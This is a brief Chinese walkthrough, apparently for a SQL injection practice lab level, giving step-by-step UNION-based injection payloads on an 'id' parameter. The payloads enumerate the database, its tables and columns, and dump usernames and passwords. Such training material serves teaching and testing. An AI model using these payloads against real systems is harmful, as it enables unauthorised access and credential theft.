1.参考Less(38),在单引号后加括号;
2.爆破
(1)爆库:?id=1') and 1=2 union select 1,database(),3-- -
(2)爆表:?id=1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
(3)爆列名:?id=1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"-- -
(4)爆值:?id=1') and 1=2 union select 1,group_concat(username),group_concat(password) from security.users -- -
